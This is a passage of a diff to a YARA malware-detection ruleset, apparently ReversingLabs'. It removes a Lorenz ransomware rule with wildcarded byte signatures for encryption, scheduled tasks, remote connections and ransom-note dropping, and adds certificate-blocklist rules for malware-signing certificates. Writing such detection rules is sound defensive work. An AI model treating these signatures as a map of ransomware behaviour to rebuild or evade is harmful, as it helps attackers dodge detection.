-		description = "Yara rule that detects Lorenz ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "cc97dd15-d518-5d9f-9384-3dcf81e34e81"
-		date = "2022-10-24"
-		modified = "2022-10-24"
+		id = "d1cf11fc-eb30-54fc-9e34-91ad0c67e694"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Lorenz.yara#L1-L252"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b8668fcc560d264c37e3fbb52d5a5f1223a282abd9e984b3109efe9ab454be9f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13150-L13166"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6f2489421f2effa2089b744f7e137818935fe2339d9216a42686012c51da677b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Lorenz"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_v1_p1 = {
-            BE ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? A5 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ??
-            ?? ?? A5 A5 A4 8B 35 ?? ?? ?? ?? FF D6 89 85 ?? ?? ?? ?? 33 C0 50 68 ?? ?? ?? ?? 6A
-            ?? 50 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 68 ?? ?? ?? ?? 6A ?? 6A ?? 89 85
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 85 C0 75
-            ?? FF D6 8B 3D ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF D7 EB ?? 8B 3D ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
-            C0 75 ?? FF D6 6A ?? FF B5 ?? ?? ?? ?? FF D7 6A ?? 6A ?? 53 FF B5 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 85 C0 75 ?? FF D6 8D 85 ?? ?? ?? ?? 33 DB 50 53 FF B5 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF D6 53 FF B5 ?? ?? ?? ??
-            FF D7 6A ?? 8D 45 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
-            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 53 8B 9D ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B
-            0D ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 89 4D ?? 66 8B 0D ?? ?? ?? ?? 66 89 4D ?? 8D 4D
-            ?? 89 85 ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 6A ?? 50 2B CA 8D 45 ?? 51 50 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 68
-            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 33 C0 50 50
-        }
-		$encrypt_files_v1_p2 = {
-            50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 D2 42 3B C2 75 ?? 83 BD ?? ?? ?? ?? ??
-            0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 33 D2 42 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 03 8D
-            ?? ?? ?? ?? 3B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 6A ?? 89 8D ?? ?? ?? ?? 0F 44 C2 8D
-            8D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 51 8D 4D ?? 51 6A ?? 50 6A ?? FF B5 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 83 A5 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF B5 ??
-            ?? ?? ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 6A ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ??
-            85 C0 0F 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF D7 FF B5 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 FF D6 8B 85 ?? ?? ??
-            ?? 50 FF D6 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F
-            5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$find_files_v1_p1 = {
-            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 6A ?? 0F 57 C0 C6 45
-            ?? ?? 6A ?? 6A ?? 0F 11 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85
-            C0 74 ?? 89 18 89 58 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 08 8B 3D ?? ?? ?? ??
-            8B B5 ?? ?? ?? ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F
-            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
-            D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85
-            C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 8D
-        }
-		$find_files_v1_p2 = {
-            8B 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 56 8B D0 C6 45 ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 59 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 75 ?? 68 ?? ?? ??
-            ?? 0F 43 75 ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 56 50 89 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B B5 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 75 ?? 56 8D 4D ?? E8 ?? ?? ??
-            ?? 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 56 E8
-            ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 59 74 ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 7D ?? ?? 8D 75 ?? 68 ?? ?? ?? ?? 0F 43 75 ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ??
-            ?? 56 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59
-            B8 ?? ?? ?? ?? C3 C7 45 ?? ?? ?? ?? ?? 33 DB 8B 85 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F
-            85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 8D
-        }
-		$create_scheduled_task_v1 = {
-            FF 15 ?? ?? ?? ?? 33 FF 85 C0 74 ?? 8B CF 8A 84 0D ?? ?? ?? ?? 88 84 0D ?? ?? ?? ??
-            41 84 C0 75 ?? 8D BD ?? ?? ?? ?? 4F 8A 47 ?? 47 84 C0 75 ?? BE ?? ?? ?? ?? A5 A5 66
-            A5 33 FF 57 68 ?? ?? ?? ?? 6A ?? 57 57 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 8B 4B ?? 8B F0 89 BD ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8D 85 ??
-            ?? ?? ?? 2B CA 50 51 FF 73 ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 C4 ?? 8B
-            F2 8A 02 42 84 C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? 8B CA C1
-            E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 8A 41 ?? 41 84 C0 75 ?? 66 A1
-            ?? ?? ?? ?? 33 DB 8B 35 ?? ?? ?? ?? BF ?? ?? ?? ?? 66 89 01 A0 ?? ?? ?? ?? 53 53 88
-            41 ?? 8D 85 ?? ?? ?? ?? 50 57 53 53 FF D6 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 53 68
-            ?? ?? ?? ?? 57 53 53 FF D6 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$remote_connection_v1 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 8B
-            5D ?? 8D 44 24 ?? 56 57 8B 7D ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A
-            ?? 6A ?? 6A ?? 58 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 6A ?? 58 53 66 89 44 24
-            ?? FF 15 ?? ?? ?? ?? FF 75 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 66 89 44 24 ?? 8D 44 24
-            ?? 6A ?? 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 8B CF 8D 51 ?? 8A 01 41 84 C0 75 ??
-            6A ?? 2B CA 51 57 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 33 C0 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$check_mutex_v1 = {
-            E8 ?? ?? ?? ?? 59 59 56 C6 45 ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 50 FF B5
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? 8B 57 ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 59 FF 77 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 50 56 FF D3 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
-            56 FF 15 ?? ?? ?? ?? 8B F8 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 94 C0 85 FF 74 ?? 84
-            C0 74 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 56
-        }
-		$find_files_v2 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 83 EC ?? 53
-            56 57 89 65 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45
-            ?? ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 EC ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 EC ?? 8D 4D
-            ?? 54 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ??
-            ?? ?? ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 4D ??
-            3B 45 ?? 0F 87 ?? ?? ?? ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ??
-            51 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 8D 45 ?? 3B C6 74 ?? 8B 45 ?? 83 F8
-            ?? 72 ?? 6A ?? 40 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 56
-            8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B
-            7D ?? 33 F6 8B 5D ?? 83 FE ?? 73 ?? 8B 0C B5 ?? ?? ?? ?? 8D 45 ?? 83 FF ?? 0F 43 C3
-            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
-            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 74 ?? 46 EB ?? 8D 4D ?? E8 ?? ??
-            ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2 ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? 8B 4D ?? 32 C0 5F 5E 64 89 0D ?? ?? ?? ?? 5B 8B E5 5D C2 ?? ?? 8D 45
-        }
-		$encrypt_files_v2_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 51 B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 53 56 57 C7 45 ?? ?? ?? ?? ?? 8B F1 8B 7D ?? 8D 4D ?? 89 65 ??
-            57 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 8B CE 50 E8
-            ?? ?? ?? ?? 8B D8 C6 45 ?? ?? 8D 4D ?? 89 5D ?? E8 ?? ?? ?? ?? 8B 75 ?? 56 E8 ?? ??
-            ?? ?? 83 C4 ?? 56 53 50 E8 ?? ?? ?? ?? 8B 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56
-            50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 C4 ?? 49 0F 1F 40 ?? 8A 41 ?? 8D 49 ?? 84 C0
-            75 ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 08 89 ?? ?? ?? ?? 4E 00 6A ?? 6A ?? 89 41 ??
-            A1 ?? ?? ?? ?? ?? ?? ?? ?? 08 A0 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 88
-            41 ?? FF D6 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 50 FF D6 68 ?? ?? ?? ?? 6A ?? 6A ?? 89 45 ?? 8D 45 ?? 6A ?? 50 FF 15 ?? ??
-            ?? ?? 8B 35 ?? ?? ?? ?? 85 C0 75 ?? FF D6 8B 1D ?? ?? ?? ?? 6A ?? FF 75 ?? FF D3 EB
-            ?? 8B 1D ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? FF D6 6A ?? FF 75 ?? FF D3 6A ?? 6A ?? 57 FF 75 ?? FF 15 ?? ?? ?? ??
-            85 C0 75 ?? FF D6 8D 45 ?? 50 6A ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? FF D6 6A ?? FF 75 ?? FF D3 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
-        }
-		$encrypt_files_v2_p2 = {
-            E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 33 F6 C7 45 ?? ?? ?? ?? ?? 33 DB 89 5D ?? 56 57 FF
-            15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 4D ?? 66 8B 0D ?? ?? 4E 00 66 89 4D ?? 8D 4D ??
-            89 45 ?? 8D 51 ?? 89 5D ?? 8A 01 41 84 C0 75 ?? 6A ?? 8D 45 ?? 2B CA 50 51 8D 45 ??
-            50 FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 75 ?? FF 75 ?? FF
-            15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 03
-            F0 33 C9 3B 75 ?? 75 ?? 85 C9 75 ?? 33 DB 83 F8 ?? 0F 95 C3 68 ?? ?? ?? ?? 8D 45 ??
-            50 8D 85 ?? ?? ?? ?? 50 6A ?? 53 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ??
-            8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ??
-            ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 45 ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F
-            85 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 57 FF D6 FF 75 ?? FF D6 8B 4D ?? 5F 5E 64 89 0D
-            ?? ?? ?? ?? 5B 8B E5 5D C2 ?? ?? 8D 45
-        }
-		$remote_connection_v2 = {
-            55 8B EC 51 53 56 57 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56
-            FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 6A ??
-            53 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B F8 6A ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 6A ??
-            8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 53 FF D6 57 FF D6 5F 5E
-            33 C0 5B 8B E5 5D C3
-        }
-		$drop_ransom_note_v2_p1 = {
-            6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 89 45 ??
-            C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 74 ?? C7 00 ?? ?? ?? ?? C7
-            40 ?? ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 89 08 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? 87 FB 00 00 00 A0 ?? ??
-            ?? ?? 88 87 ?? ?? ?? ?? 8B F7 8D 4E ?? 0F 1F 40 ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 46
-            ?? 50 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? ?? ?? ?? 6A ?? 8D 04
-            33 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F3 8D 4E ?? 0F 1F 44 00 ?? 8A 06 46
-            84 C0 75 ?? 2B F1 8D 86 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56
-            53 57 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 04 37 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B F7 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 86 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
-            D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 04 33 68 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F3 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 46 ?? 50
-        }
-		$drop_ransom_note_v2_p2 = {
-            E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 53 57 E8 ?? ?? ?? ?? 6A ?? 8D 04 37 68
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F7 8D 4E ?? 0F 1F 00 8A 06 46 84 C0 75 ??
-            2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? ?? ?? ??
-            F3 0F 7E 05 ?? ?? ?? ?? 83 C4 ?? 66 0F D6 04 33 8B F3 8D 4E ?? 8A 06 46 84 C0 75 ??
-            2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 53 57 E8 ?? ?? ?? ??
-            6A ?? 8D 04 37 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F7 8D 4E ?? 8A 06 46 84
-            C0 75 ?? 2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ??
-            ?? ?? ?? 6A ?? 8D 04 33 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F3 8D 4E ?? 66
-            90 8A 06 46 84 C0 75 ?? 2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ??
-            56 53 57 E8 ?? ?? ?? ?? 6A ?? 8D 04 37 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            CF 5B 8D 51 ?? 0F 1F 40 ?? 8A 01 41 84 C0 75 ?? 8B 75 ?? 8D 45 ?? 6A ?? 50 2B CA 51
-            57 56 FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 5E 64 89 0D ?? ?? ?? ?? 8B E5 5D C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( all of ( $encrypt_files_v1_p* ) ) and ( all of ( $find_files_v1_p* ) ) and ( $create_scheduled_task_v1 ) and ( $remote_connection_v1 ) and ( $check_mutex_v1 ) ) or ( ( $find_files_v2 ) and ( all of ( $encrypt_files_v2_p* ) ) and ( $remote_connection_v2 ) and ( all of ( $drop_ransom_note_v2_p* ) ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SpectorSoft Corp." and pe.signatures [ i ] . serial == "5f:e0:ad:6b:03:c5:7a:b6:7a:35:21:59:00:4c:a3:db" and 1402272000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Winword64 : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_642Ad8E5Ef8B3Ac767F0D5C1A999Bdaa : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects WinWord64 ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a5f7967d-58f4-5fdd-b67f-5f5dbfec0f4b"
-		date = "2021-02-11"
-		modified = "2021-02-11"
+		id = "d29e2342-2d38-5939-aa3f-4506fb36c74a"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.WinWord64.yara#L1-L215"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "73d8c4f1b3bed365320b26332f1f1b49404d8e6536f3e25042f5f64e5bc09bd4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13168-L13184"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d42d40ca381b99b68a3384cecf585aab2acca66d4e13503d337b1605d587d0b5"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "WinWord64"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
